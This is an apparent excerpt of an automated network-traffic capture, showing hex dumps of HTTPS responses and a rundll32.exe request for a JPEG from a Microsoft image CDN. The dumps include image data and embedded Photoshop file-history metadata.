                                                                                                                                                                                    2023-01-05 07:58:11 UTC7153INData Raw: 19 cb 13 1e 56 49 25 c8 00 f1 50 d4 23 c0 78 85 b7 f7 e9 a8 07 27 87 56 76 2c 09 e2 c0 b5 7c 40 ff 00 e5 a4 c4 99 3d 99 91 64 71 45 0c ca a0 56 9c a4 70 ff 00 0b 75 49 0e 46 d1 2e 5a 1e 14 2b 5f b4 2d 0e 86 22 31 ab 31 36 f2 3d 5f 88 e3 51 ca bf 83 dd d5 08 48 c2 46 3b 32 05 31 78 80 47 b7 fc 38 d6 bf 66 b2 bf 03 4f 24 8d ed a5 0d f4 ec 4c 08 a1 68 ac 00 f0 1c cc 8b d4 6e d7 36 84 b9 59 35 d8 df 04 19 b1 57 bc 4b 02 63 82 34 22 9e 21 d8 f0 5a 79 ae af 37 bb ae b6 b0 62 55 e7 ac b9 51 ba 4e 58 b0 ba ae 4d 0d d5 f1 fe 11 6f 36 8a 24 b8 06 e4 f2 84 63 ca 8d 10 1d ae d0 b8 8f 0f 98 39 a9 f8 75 bf 2b 24 90 b6 cd b2 77 dd 6d 65 28 d5 09 c0 1a 2b 29 5e 66 5f 85 39 b5 5b 23 ae 0a a9 b1 79 d6 50 53 16 56 66 a2 1e 6f 16 14 f6 81 ae 2a 2f a9 ab 7f 41 4b 48 f2 ad 92
                                                                                                                                                                                    Data Ascii: VI%P#x'Vv,|@=dqEVpuIF.Z+_-"116=_QHF;21xG8fO$Lhn6Y5WKc4"!Zy7bUQNXMo6$c9u+$wme(+)^f_9[#yPSVfo*/AKH
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7160INData Raw: be d5 c5 5f bc d2 b4 7c bf b4 97 8b 97 1c 39 86 4d bc 18 d2 84 48 ce 6f aa a8 e9 f2 db c7 93 58 3d 2f 62 8d 8f fd a6 bd d5 5f b4 aa 8a 19 b7 20 64 84 29 2e a5 c2 a1 20 03 5e 21 6f 66 3e 1c dd 5a e8 c6 95 93 27 3b 18 c4 91 4d 3b 05 66 25 87 07 06 82 96 5b d3 f7 4e b6 56 4d 4a 31 6a 19 61 ba fd 18 8d 5a 3c 74 8d 66 2c 8c 6e 66 72 c8 41 fb 6c b7 9b dc d7 36 ba 5e 65 b3 a2 f6 51 84 39 b7 ee 31 ec f8 8e d3 41 0e 46 4c ca 6d 27 98 8a f4 46 bd 5f 0d cd ac bc 8d 16 dc d4 59 d1 22 b5 6c 54 43 79 d9 30 b4 76 c1 dc 19 17 8e 0a 00 45 04 93 22 47 f8 b9 6b ad 75 2b d7 0f ed 22 ee ad 63 92 3a e0 40 55 72 59 c5 5c 8b 40 1c 05 05 b5 66 f6 b9 6d 53 d8 f8 32 85 03 b8 a0 97 02 e5 28 0d 2a 4f 8d 5a 86 83 cd 76 a7 b8 92 1e c1 ca 8e 69 17 ea 56 a1 1b 80 6e 22 db 48 e3 e5 e9 e6
                                                                                                                                                                                    Data Ascii: _|9MHoX=/b_ d). ^!of>Z';M;f%[NVMJ1jaZ<tf,nfrAl6^eQ91AFLm'F_Y"lTCy0vE"Gku+"c:@UrY\@fmS2(*OZviVn"H
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7343INData Raw: 28 7f 0f 37 4a b6 8a df ae 07 03 b8 9b 6c 7f 57 1b 00 44 70 af 0a f0 00 29 54 a0 ff 00 bf 53 6d 98 04 13 e2 2c f8 b3 3b 06 2d 23 56 4b 2a 5a 8d 75 04 7f b7 c9 a7 5b e5 08 ff d7 85 b5 61 36 38 5c 99 52 f1 46 61 11 e0 1a 94 fa 68 cf ec aa b4 92 7f cb 5f 8f 5f 30 ec 88 48 84 f2 64 3e 2c b2 d4 48 d3 e4 87 90 b7 b5 82 b7 76 9f e2 f6 ae b5 4f ea 4b 61 1e df df 46 5c 72 57 2a f8 8d 95 f6 06 0c cd 19 ff 00 73 ab 49 31 d4 f3 00 38 f1 e4 0e 04 51 6d a7 12 49 37 49 fe c0 ba 64 90 36 f9 8a 33 bb 1e 2c 28 3f 71 17 5b f8 54 ea ae 89 44 e1 2a 64 c1 16 3b f2 18 dc 3a fb 2b 4e 46 5f f6 73 af dd d2 ae 06 56 e2 63 06 69 26 ca 35 2a 8e cb c7 c7 d9 fe f5 da 6d fd 04 48 da d7 b9 05 8e 39 6d 24 aa 2f 8a 83 d2 3e 2e 6d 43 e4 62 3c 9c cc 24 20 99 0f 28 f7 40 17 7f e3 a4 f2 05 44
                                                                                                                                                                                    Data Ascii: (7JlWDp)TSm,;-#VK*Zu[a68\RFah__0Hd>,HvOKaF\rW*sI18QmI7Id63,(?q[TD*d;:+NF_sVci&5*mH9m$/>.mCb<$ (@D
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7359INData Raw: 32 82 09 1e 36 fc 29 a8 6a 00 89 2c 92 62 c0 b3 28 a3 91 77 16 e0 09 3d 46 bf ea 75 2a 7c 3a a4 93 01 fc bc 95 81 d0 8a 33 12 56 9e ce a0 4b 7c 5c af cb ee db a9 48 44 9d c3 12 35 44 85 98 a0 5a 00 78 12 57 ad 38 fb 78 f2 ea 6a fd 46 c8 8f 8c 31 22 11 c8 ca b7 50 15 41 53 cc 79 94 fd 8c de ef 97 4d b9 03 d4 70 ff 00 d6 b9 e3 59 19 11 2a 7c 2f 37 2f f0 af 56 a1 f0 33 d7 73 fb 7b 08 97 8d 04 8c 01 fb 18 94 b3 f1 7f 97 49 ae c0 37 8f 0a ae 39 97 c4 30 8d 40 5a 53 89 a9 2d fb b4 bd 44 58 e3 42 71 e5 97 88 47 90 dc 7e 10 3a 23 63 f0 a9 e6 d2 ba 94 34 7b 8b 2d a4 4e e8 07 91 a8 b4 3d 2e 45 91 49 fe c6 69 75 35 af 52 d3 2a 0a 45 24 91 c9 1c 85 9c 1e 56 7f 31 af 4b fb 8d ad 60 96 cb 41 20 ed 8c 5b 8a cc 18 33 8a 53 95 45 45 ff 00 15 fa cb ac 64 08 98 7b 7b e4 c4
                                                                                                                                                                                    Data Ascii: 26)j,b(w=Fu*|:3VK|\HD5DZxW8xjF1"PASyMpY*|/7/V3s{I790@ZS-DXBqG~:#c4{-N=.EIiu5R*E$V1K`A [3SEEd{{
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7367INData Raw: c8 2a 79 a6 65 d7 3a d9 59 e7 93 4e 8c 30 99 a7 96 12 51 40 52 5c 5f 5b 4d 8b 73 33 53 dd a7 26 8b 19 c1 ff d7 a3 ef 3f 74 42 d4 69 08 40 94 1c 28 45 d5 fb bd 2c da f9 9b 54 c9 8d ce 52 91 c1 8e c0 63 a3 06 a8 1c 4a f9 e5 6a f5 33 3f 2a af 97 54 03 1b ac 29 2e 53 96 52 8b 45 55 e3 5f 0b f4 aa c4 c7 fe 92 59 24 5c 92 44 9f 52 b0 df f6 80 a0 f8 7d 96 b0 e6 fb ba 6e d0 a0 63 7b 6a c3 99 44 70 01 90 b8 56 6f 1f 1e 4f f0 ee 2f f3 6a 9b 80 43 db ae d9 d9 c9 be 3a 10 86 c6 3f 60 43 71 fe 34 d1 da 50 ec 47 8d c3 4e 1a 45 2e 8c 54 11 f6 73 7e 6d df f6 bb 49 70 24 24 cd 22 28 0c 6d 00 b2 fd bc 11 ad a7 1d 36 16 1e 57 96 35 5e d2 d5 5e 88 ac 38 92 78 9f f0 55 e5 d6 6d 48 1e 5a 07 c1 0f 1c 6e 8f 32 97 20 11 77 07 fc c4 fd e8 ba a9 90 27 ed 3f 32 e9 72 29 2d af 50 a3
                                                                                                                                                                                    Data Ascii: *ye:YN0Q@R\_[Ms3S&?tBi@(E,TRcJj3?*T).SREU_Y$\DR}nc{jDpVoO/jC:?`Cq4PGNE.Ts~mIp$$"(m6W5^^8xUmHZn2 w'?2r)-P
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7447INData Raw: 98 66 5f 6b 46 55 99 00 e6 72 39 79 7d 96 ad ab ae e7 ed 50 62 d1 61 b7 e5 e4 63 4b 0a 48 82 f8 b2 22 61 20 1e 14 f2 7f 1d d2 6b 17 1c a1 d4 8b b8 db 97 32 61 96 04 4c 64 52 47 8f db 56 af 87 de d2 a6 14 92 f9 24 62 c1 d9 66 56 5b e0 c7 ef 33 fc 65 95 7b 4b fb 12 e7 bb 87 97 44 a2 d2 21 ec f0 b4 f9 2b 04 6c 44 4f 32 21 54 34 15 bb b6 c6 de 9f 97 e4 d4 ee 7d 6a ff 00 d0 28 a5 c1 b8 cf f4 e2 63 ee 13 e2 ed a5 1d d6 32 8a a0 f8 5f ef 37 c6 97 73 6b c7 a7 92 eb 59 d8 77 5f 4a 7f 68 c7 ff 00 a3 f5 8e 0a 3e 41 49 c9 b9 82 01 68 76 00 3a dd e6 5d 73 3f f2 af b6 17 b4 d2 be 22 83 25 bd 40 d8 59 e7 0d 9a d8 d4 2d bc 29 e1 c3 5e df 8f b3 e4 a7 63 ce db af a3 82 ad f2 26 19 1c ec 63 76 6a 82 0d 08 45 e1 ec d7 57 44 d1 9a 70 5e ef 5b c2 c9 85 85 8a 86 50 32 08 9a ad
                                                                                                                                                                                    Data Ascii: f_kFUr9y}PbacKH"a k2aLdRGV$bfV[3e{KD!+lDO2!T4}j(c2_7skYw_Jh>AIhv:]s?"%@Y-)^c&cvjEWDp^[P2
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7463INData Raw: dc 31 26 8f 27 72 48 61 68 ee 09 12 90 58 02 2d 0a a7 9b 95 7e f5 cf af 3f fb da 6c b7 5a 64 e8 7a 5d 54 b2 ab 27 70 8b e8 c2 b3 31 9a e2 5b ec 17 1a d9 f7 bb 69 73 37 91 1f e2 d7 43 ac 98 0b b5 ef 76 46 04 77 34 ec ec ac fe 50 0f 42 8f b8 9a 77 a8 26 09 8d 1c b9 1d f9 24 67 51 1d 14 32 0f 1b ba 87 1f 63 d9 cc da 6b 08 09 64 e2 e2 ed b2 63 97 33 65 51 39 c8 f0 5b 5a eb 18 72 f5 0e 7f e1 d5 54 b4 57 ed 2a d1 42 72 63 20 46 63 68 65 6a d6 b5 5a ff 00 d9 35 56 b6 60 93 ff d1 cc 62 8c e9 20 c9 97 6e a2 a6 3c 44 b5 4d 4f 38 0c bf 7f 22 67 7f 27 22 6b c0 75 ce 4c d2 19 c9 c6 30 8c ec b2 ca 59 cd b4 5a 85 12 3d 3b ab 6f 32 bd b7 7b da 1b ca 43 63 3b 36 24 5b 86 2e 46 64 8e 04 91 ce 91 5a c7 85 29 64 74 5f 87 f3 2e f8 35 ad f1 04 a2 a5 e1 c8 8d b1 e6 88 90 f3 4a
                                                                                                                                                                                    Data Ascii: 1&'rHahX-~?lZdz]T'p1[is7CvFw4PBw&$gQ2ckdc3eQ9[ZrTW*Brc FchejZ5V`b n<DMO8"g'"kuL0YZ=;o2{Cc;6$[.FdZ)dt_.5J
                                                                                                                                                                                    2023-01-05 07:58:11 UTC7471INData Raw: a5 7e 68 b9 b9 bd 96 6b 67 0b 23 43 1b d3 4d 3c 92 e3 0e 22 3c 99 62 50 a6 94 51 4f f8 d9 99 b5 95 b0 c4 f2 47 9c a6 1a fd 2c 04 49 34 74 62 e3 88 51 21 b7 81 3e e2 69 29 79 02 3c 9b 6a c0 b1 c6 a4 93 13 82 e7 c2 a4 9e e7 f0 d9 f6 69 d2 f2 26 89 7b 7c 0b 1e 4d 24 0c 88 32 d2 94 ea 70 41 8e 44 0a be c2 ba b9 34 a9 03 74 80 41 91 26 db 84 cb 24 66 69 1a 0a 10 48 1c bc 84 8f fb 72 6b 75 c4 91 64 47 6c 64 08 91 b3 2d 81 c3 b8 3e 16 b0 fb 3d de 4d 25 69 26 0b 4f ab 18 59 58 e7 b8 1b 27 28 bb bb 02 4d 10 05 68 95 3f c7 93 e2 d4 29 6b fd 0d 22 0f 30 59 3e 33 b8 50 5a d5 13 80 78 30 15 4f 97 ee b7 33 57 51 7c 10 45 b6 29 af 89 09 5c 7b da 39 49 f1 0a 38 a7 fb 19 b5 69 82 2f fd 3d ba 65 60 6c f2 b4 8a 20 54 99 63 85 69 77 31 05 8b f3 1a b5 b6 ff 00 3e b8 f6 78 95
                                                                                                                                                                                    Data Ascii: ~hkg#CM<"<bPQOG,I4tbQ!>i)y<ji&{|M$2pAD4tA&$fiHrkudGld->=M%i&OYX'(Mh?)k"0Y>3PZx0O3WQ|E)\{9I8i/=e`l Tciw1>x


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    34192.168.2.44973380.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1167OUTGET /cms/api/am/imageFileData/RE57vGT?ver=0a71 HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1911INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE57vGT?ver=0a71
                                                                                                                                                                                    Last-Modified: Sun, 01 Jan 2023 05:22:44 GMT
                                                                                                                                                                                    X-Source-Length: 1821929
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: d55ed2d0-3ca7-4699-b0f1-6161fb3bf55b
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Length: 1821929
                                                                                                                                                                                    Cache-Control: public, max-age=77137
                                                                                                                                                                                    Expires: Fri, 06 Jan 2023 05:23:47 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:10 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1911INData Raw: ff d8 ff e1 15 04 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 31 36 20 31 35 3a 30 36 3a 34 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 21.1 (Windows)2022:09:16 15:06:408"
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1927INData Raw: 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1943INData Raw: 33 3a 33 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 36 35 36 37 34 36 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 35 34 3a 35 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 39 30 36 37 35 33 35 33 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61
                                                                                                                                                                                    Data Ascii: 3:37-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-176567468_1920x1080.jpg saved&#xA;2016-07-26T10:54:50-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-490675353_1920x1080.jpg sa
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1945INData Raw: 34 30 31 31 39 30 37 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 38 3a 30 30 3a 35 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 31 2d 52 6f 75 6e 64 5c 5f 43 72 6f 70 73 5c 45 64 67 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 33 39 33 35 31 31 30 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 38 3a 30 33 3a 34 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 31 2d 52 6f 75 6e 64 5c 5f 43 72 6f
                                                                                                                                                                                    Data Ascii: 40119075_1920x1080.jpg saved&#xA;2016-07-26T18:00:50-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_1-Round\_Crops\Edge_GettyImages-173935110_1920x1080.jpg saved&#xA;2016-07-26T18:03:46-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_1-Round\_Cro
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2661INData Raw: 32 30 3a 33 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 38 54 31 30 3a 30 37 3a 35 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 30 39 2d 31 38 54 31 30 3a 31 31 3a 30 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 53 72 65 77 61 72 64 73 5c 41
                                                                                                                                                                                    Data Ascii: 20:30-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2016-09-18T10:07:52-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2016-09-18T10:11:06-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MSrewards\A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2685INData Raw: 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 31 34 54 31 35 3a 35 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 43 6f 72 74 61 6e 61 2d 52 65 6d 69 6e 64 65 72 5f 47 65 74 74 79 49 6d 61 67
                                                                                                                                                                                    Data Ascii: e C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2016-11-14T15:51-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Cortana\Cortana-Reminder_GettyImag
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2724INData Raw: 66 66 69 63 65 5f 53 6b 79 70 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 38 36 36 37 38 39 30 31 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 32 33 54 31 35 3a 32 30 3a 33 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 4f 66 66 69 63 65 2d 42 61 74 63 68 32 5c 5f 43 48 4f 53 45 4e 2d 53 6b 79 70 65 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 5f 53 6b 79 70 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 36 30 35 36 32 32 35 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 32 33 54 31 35 3a 32 31 3a 34 32 2d 30 38 3a 30 30 26 23 78 39 3b 46
                                                                                                                                                                                    Data Ascii: ffice_Skype_GettyImages-186678901_1920x1080.psd saved&#xA;2016-11-23T15:20:36-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Office-Batch2\_CHOSEN-Skype\Crops\Office_Skype_GettyImages-660562255_1920x1080.jpg saved&#xA;2016-11-23T15:21:42-08:00&#x9;F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2764INData Raw: 5c 43 48 4f 53 45 4e 5c 4d 49 54 2d 4e 41 53 43 41 52 2d 46 65 62 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 34 33 37 36 36 36 36 35 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 33 30 54 31 31 3a 31 30 3a 32 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 4e 41 53 43 41 52 2d 46 65 62 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 36 39 30 39 31 36 33 38 5f 31 39 32 30 78 31 30 38 30 41 45 45 46 45 38 41 32 43 31 46 42 31 37 41 44 37 39 39 34 44 44 41 34 38 30
                                                                                                                                                                                    Data Ascii: \CHOSEN\MIT-NASCAR-Feb_GettyImages-543766665_1920x1080.jpg saved&#xA;2017-01-30T11:10:25-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_MIT-NASCAR-Feb_GettyImages-469091638_1920x1080AEEFE8A2C1FB17AD7994DDA480
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2780INData Raw: 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 37 54 31 34 3a 33 33 3a 32 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 37 54 31 34 3a 33 35 3a 32 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 53 4e 2d 47 61 6d 65 73 5c 43 48 4f 53 45 4e 5c
                                                                                                                                                                                    Data Ascii: 08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-02-27T14:33:29-08:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;2017-02-27T14:35:20-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MSN-Games\CHOSEN\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2933INData Raw: 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 32 32 54 31 37 3a 35 38 3a 32 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 32 32 54 31 38 3a 32 37 3a 32 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73
                                                                                                                                                                                    Data Ascii: 0x1080.jpg saved&#xA;2017-03-22T17:58:25-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1920x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-03-22T18:27:27-07:00&#x9;File C:\Users
